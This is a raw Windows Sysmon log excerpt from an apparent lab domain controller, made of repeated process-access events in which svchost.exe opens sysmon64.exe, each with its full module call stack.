13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.455{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.455{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.455{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.455{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.455{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 